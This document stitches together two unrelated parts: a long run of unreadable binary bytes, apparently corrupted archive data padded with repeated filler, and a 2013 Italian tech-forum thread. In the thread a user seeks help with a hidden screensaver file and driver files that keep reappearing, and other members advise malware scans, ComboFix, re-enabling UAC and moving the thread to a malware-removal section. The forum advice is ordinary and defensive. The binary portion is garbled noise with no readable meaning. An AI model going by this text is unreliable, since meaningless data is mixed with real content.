P PAHK.,p4=+ҍ>3*K\:cRBr@YԑJ̽YIP *m&5Ȓ;u~*&?5\C>Q [[5P PAEA^[W4 '<6X\J2Q,AGGzCDT> 3 "O`XcB HXito0Pn<oAl!2+\P PAUh[3)oBlDdζESI7 oK@Fn[{W*S8 e *~)1`t0Yd2~hF*<G@k{E]P PA8L>5d
jqyqĴŢ{<ȔGuY-.4+~
u$'?vtIUyG-9~Pۻ`֙OzT:ͰP PAm?'b~Oa[x7 Є q/<1Xm>| ^*^e ñI8X`"bN
Ӵ !
MG.GiړP PAǿ/ڄvH߈be%PmжMe]`J=*spLM@x,e{g2FpJ!| &A0h$>P PA<5FPfLe}4UtiC+C<<b%*J
!](r$:bbjIBɗ
_HL{
<f.x 5mP PA*Zzo)<h42eͿ*D/zl_갵E"8FPS B⹿7=6!ͿU[*P PAlv E,"uH35L68o>VB3*`0
v|Gˀ9۹~_+6|QeL| l(9P PAH9GwT?7(YBefRm@v@3
Xr'Jo6{'G t3R!DЮ8m;Bjm@*7ޚAP PAl{[A>ѻQ)*Lg WkSq";01$UށX'fFZ,3/h6ܢI c˅-bӦX~u+cBP PAwOi}ê3*nHiߵh_qy/Gs ]<ӁpFɫ-*xH P: 5/RUAU.q;:#~/&_1*FP*P PA*:.;䬵'.Ɠ("yD"̺Ű
!&&#;28$h~\a"+%V̢[kÊ%4ˎQ-JBꨛBDP PApƺ ArHCD 8 r + ʊѐ3Z$
* D쬣%<@ V-$0<7)@;t/ =P PAdj 'n_16c #`~j.i@Btxa.ݜeoӽM>׵FOLF b^KP PA{#Aȵ$sV<T~L<ܔؾ5$6Z&VӶgB A`ڟsnNSiՏR?MiF*kP PA*@~cjnn ʽ0]Aԑж:Y\^D/x
o]*-`˨"Ȼm>߁M;Ai0Tpx1m> 5r2[RވP PA;6!)#P1e "iae{=c| Br|b̸=қ?u^*T|+v{zh.zb8( iSnnoCRP PAf:j)˗@v!Dpd dH:RKX" W@jϗ*`6*Ɉ.Z۩9,vO
tӻL結A P PApC~/9d}z,iaF5Q.q )7}y"Vo+O@J*ǝrUst˔vSїlbE]}Q 5Ag։ˢ5 /P PA}bȨ %Xd8L#AߪR>㱊9?P
*ˋz\tq*mDbU16U BaV*ASwU)MT#MU)_P PAA:{$*sYHR@`\1NH*TH9{X2sw=["W BgxQ|
FP PA53
|}s")X!j(q25rѐATv8 #  =Xb)_gab Pln ﶱ 56FvA*P PA^u`6Ŝr L|]ăL\{5?ڧQx)Vjak~-|*}^ໝs^X| kRg>HC٫!EP PA@$ lpl9w.;2p@K
7* 8y]R|nAfƦ<ώ,*n %ϫc K\kK<m+n]S5n 3JXс@P PA*^$H_3Z5G2G(ϙ#4EQCԤ#[I*.
@N8}׊MbU_P PABe,rILLnLhfU Mć EYTi^'!:,*WnuV9>F"0U)4Rd~UJ*U~E;P PA0jUN4桃-B]奻BSui@yA*rDoX+o+t7'u绷M1CmwW߄Uj@[~^Y` P PAwوeݽcD&ԺQ2
"qtO㰫 Y ?Κ'J^ }c2*Ýpfr}arV P PA@) (*VIOwt۫oh
6\_D+u#b8Lূ A2kiyդnemK)Ԫ5onkPqej$P PA?Xz}oe@kA166M
(_xSqEe$7ar:9oaO5,p邹|!(x 녋2H NJ>NP PA&Թ*X=b3]nr3J%s=cظBZۡ"4zuB
ҝǫrc)b|ϰ(_Jood)P PAVꅾ {'6qcW_*3"mԀ}Ԓ/e+U}L*Vk
XKMN2wkjbS>#;2P PAǫ+]uK!B*Ck.% q)yT@1tadmV7S,h7%!w^\0IynajNP PA95ƣf{dDG^gXO^t̊oFW
U~d;/Y*jv?&#Q
<oI4*B|t0/
anEP PA3.V}V2yx!f"g@w բ,TOB_mX@zhK^5s$X0pPx=눛r('FE"':P PAU7,trԓIuQ g8 cIM}দ*/xՌe`p^.]Naw?'XTPDxUezZAϰ*jP PAP$tƧ*M"(#2:*EK4aο
Elxq$6e_,'TQ=헣ԥrCjՐS[M/|fQsёP PAUhN/K- o`
6zӳ#áu5+A\QX=CzEKâd
EaLR$w(QD,P PA|PO
xU&&(YdMP ќYm|:*^}aC0-F+/]h87]2*CӁr!.2ХP PA
/!R}\`%pl8PD>Ui58c5ֻ?5|Z*}Y6UU
x1bWA$8+iSYP PA-)?Z,Sqg_243*W*0]Ed _FG^["]TSOnӱ&)8OG#P PAc*l6zRyj\_xVN:7v$?kvg*0ZHLmԿXO,ݜ˸IЁzޮ^SP PAbS *ѵ _1}x8<RY >\<AfUp,
O-(`bSUHqZ7%`'Sl_$e@P PA'xKZHrf.(& 4WvZ@ _
E+8E :iR;)!H/f{ ͒۳TQ,G8n{<? P PA`aӊGDs{wƜb/" .@a/k ٟSɆ#--g<@ǜ^2w)5$&b3
u6_<*j-t0P PAכqsIT3*y_99[u{(SC>KiWis8}<:jQG5'J $Mt1PcS~i`zwr@ P PAB-QObQrt-Kp?2, e.~%(Sn3R[m9J@#T2x⨒.Pt;&^!]ȕsA<R` _@4_P PAՙԗ#S{~܋ə*IGU0IxfKt+{6zZ;l!'ٷAiUM$ԒZCڒ#WycӑP PA
wY2GrXX|(;p3x#TȏlxM Ũ}K QE8*
7,oVp:@Wx99AKWP PA&c^PɊa`55m5q(bERrP Tt_'O-
Xn 
!'*3H<"8\[w6P PA%q}bX(YN79G~g])P<{(!f`7AQ=HA[XV'}&/cMި#r!naPycXVP PA^Z*/eݘx$Ӈwpϑzr|1E񰈾~y>ZcPkeMAyf[7*]!f`HAٸP PA4Tr|t )oG䂆Yاdpn؃?D'
И)ҁytjn/E AuC]< 3Ȯ0YsZ97; 5Aj~;DP PA?VXА h 4SMB*
{ l]6
b|vf#22b>>xvKE}iUmFNsXK,aJe;P PAj+ sA\C@k;
t-jr-j?$k-'ʛ1aB@䔶ZtGŽ*'AT/|9
*^P PA{pUpT
k9z2(湿*Dִ2s-0 3Ei]3* 6Juo ST9W3K66;zJ0P PA-j Ui0n@k[5 }e<j
w?'mJYNGg*oV$<+Fs_ʾm$d#H>.My6z=|ꤞiRP PA\rjWpcU;Ⱦi k籩_s JҰH稇C/
iU8BE}vvgbU?*ȅ5L2Jk.9;6g߹;P PA`\!å_u q@qf{Aq &WZDP3<%rgRmAHLJo'T ;_*FYic@P.,)g;a
P PA45X$&<K ;(dX KاϪ2F#UnQPԁhUFN~⛦S5~9ac?*YXƬmNGP PA}@t|n/7 `!H,«SHF~ky%NG ƈ~<dcp`*"
d&[vʁ87/8P PAz)GAPQ\T#pʧ1IEݰcŮvds҉i Sat*e]ItxyC4$@UV Y\P PA8t/aܔ P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PA P PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
Eress
13-02-2013, 10:05
Con o senza avg hai il pc infetto, procedi a una scansione con MalwareBytes meglio in provvisoria. Se non dovessi risolvere segui la guida alla rimozione

http://www.hwupgrade.it/forum/showthread.php?t=1599737
Khronos
13-02-2013, 10:09
scr
screensaver.
qualcosa ti ha instillato uno screensaver che probabilmente faceva finta di farti qualcosa. e invece stranamente per tuo "c..." ti si apre col blocco note.
trova quel file e eliminalo.
enrico123
13-02-2013, 10:18
Grazie anzitutto per le risposte! :)

Il file si chiama msyiwgbp.scr, avevo gi provato a cercarlo ma non lo trova!

Posso cercarlo in altra maniera o provo la scansione con malwarebytes? Ho effettuato le scansioni sia con AVG che con spybot senza successo.
Khronos
13-02-2013, 10:33
non un virus, indi non te lo troveranno.

sar sicuramente un file nascosto.
e secondo me, nei Temporanei di windows. o trattandosi di un .SCR, pu essere stato inserito direttamente in C:\windows .


quindi.

1) start -> opz car

clic su Opzioni cartella.
visualizzazione.

metti tutte le spunte a Mostra e Visualizza.
togli tutti i Nascondi.

poi ricerca di nuovo il file in tutto il pc.
Eress
13-02-2013, 12:28
Secondo me quello un virus camuffato da screensaver. Mi pare strano uno screensaver all'avvio del sistema. Per prima cosa farei una scansione poi nel caso non fosse un virus procedi in altro modo.
enrico123
13-02-2013, 12:48
Grazie ancora per l'aiuto.

Ho ripetuto le ricerche con la visualizzazione dei file nascosti e di sistema attiva, ho ricercato per nome, con *.scr, per data di creazione ma niente, il file non salta fuori.

Nel mentre, AVG stava facendo la scansione pianificata settimanale, ed ha rilevato 4 minacce, tra cui il maledetto!! Ho rimosso tutto ed ora pare che non ricompare pi... per sicurezza sto ripetendo la scansione e poi provo a riavviare nuovamente.

Il percorso scritto qui (non capisco bene perch alcune parole sono troncate):

http://img845.imageshack.us/img845/3526/immagineoqy.jpg
Khronos
13-02-2013, 13:02
il percorso in notazione dos 8 caratteri.
nulla di particolare, normale.
enrico123
13-02-2013, 13:23
Confermo che il file scr scomparso. Nella scansione, per, aveva trovato anche un file driver spxr.sys. Ho rifatto la scansione ed ha trovato un altro driver, spll.sys. Ho ripetuto nuovamente un'altra scansione e stavolta ha trovato spsa.sys... cosa sono? :confused:

Tra l'altro la scansione segnala 5 rilevamenti, ma sempre per lo stesso file! Inoltre, alla fine della scansione mi dice di riavviare il pc.

Sto provando una nuova scansione, vediamo che succede...
Eress
13-02-2013, 13:30
Comunque le scansioni in casi del genere sempre meglio farle in provvisoria.
enrico123
13-02-2013, 15:46
Ho provato a fare la scansione in modalit provvisoria... ha dato un po' di errori, non so se normale, non ricordo i codici ma erano del tipo 00xe00 etc.

Comunque fa ancora come prima... cio la scansione trova delle minacce nella cartella dei driver che poi elimina, occorre riavviare il pc e ritornano con nomi diversi anche se simili tra loro!

Ho visto, per, che, anche prima di eliminarlo, se vado nella cartella C:\windows\system32\drivers quel file non lo vedo! Neanche attivando la visualizzazione dei file nascosti! Come possibile?
Khronos
13-02-2013, 16:13
file nascosti E di sistema.
quel virus polimorfo. si finge un driver di sistema e cambia sempre nome, ma te trovi solo il driver e non l'eseguibile sorgente. ne ho visti troppi.
e ho visto anche che AVG e AVAST non ci sanno fare.

fai cos. a quanto pare AVG non contrasta quello stronzetto.


scarica Combofix (cliccami) (http://www.bleepingcomputer.com/download/combofix/).
staccati da internet, disattiva AVG e fai partire combofix.
poi alla fine cancella la cartella C:\qoobox (che conterr quello che ha trovato e messo in quarantena). al massimo, dentro la Qoobox, dovresti trovare anche un file di Log che si pu leggere.

poi:
pulizia disco, cancella tutti i temporanei (sempre con internet staccato).

infine.
domande veloci:

UAC attivo e al massimo livello?
navigato in siti strani o scaricato qualche programmino ultimamente?
Eress
13-02-2013, 19:18
Un altro consiglio; cambia antivirus e abitudini ;)
enrico123
13-02-2013, 19:55
sto facendo la scansione con combofix, ma da oltre mezz'ora sulla prima schermata "tipicamente non impiega pi di 10 minuti" senza fare le diverse fasi...

per Uac intendi gli avvisi tipo di conferma prima di installare o aprire qualcosa? quelli li tengo disattivi da diversi anni, sono un po' fastidiosi...

per il resto niente di che, ho visitato un sito abituale dove per ho visto apparire l'avviso di avg, non so se per questioni di dns errati sono finito da qualche altra parte (il sito non si apriva)
Eress
13-02-2013, 20:16
Come dicevo prima, devi cambiare alcune tue abitudini quando sei davanti al cp. Intanto riattiva UAC al massimo livello, cambia AV, fai maggiore attenzione a quello che scarichi e ai siti che visiti.
A questo punto ti conviene farti spostare da un moderatore nella sezione rimozione malware. Per questo c' il pulsante segnala.
enrico123
13-02-2013, 21:39
Grazie, ho richiesto lo spostamento ai moderatori!

L'ho lasciato per circa un'ora e mezza, niente, non si schiodato da quel punto, quindi l'ho chiuso...

Quanto all'antivirus, avg lo uso da una decina di anni e non ho avuto particolari problemi, comunque sono pi che disposto a cambiare in meglio, cosa mi consigliate di usare?

Per fare piazza pulita di questi file .sys invece cosa posso fare? Vorrei evitare di formattare, giusto perch a rimettere tutti i file e programmi che ho ci impiego parecchie ore di lavoro!
Eress
13-02-2013, 21:45
La pulizia proverai a farla sotto la guida degli specialisti in rimozione malware. Come alternativa AV ti consiglio MSE alias Microsoft Security Essentials
ezio
14-02-2013, 10:30
Grazie, ho richiesto lo spostamento ai moderatori!

Nella sezione "Aiuto sono infetto" c' una guida alla disinfezione da seguire scrupolosamente, passo passo, prima di aprire un thread (sono richiesti anche i vari log). Procedi come da istruzioni in modo da assicurarti che il sistema venga ripulito a dovere ;)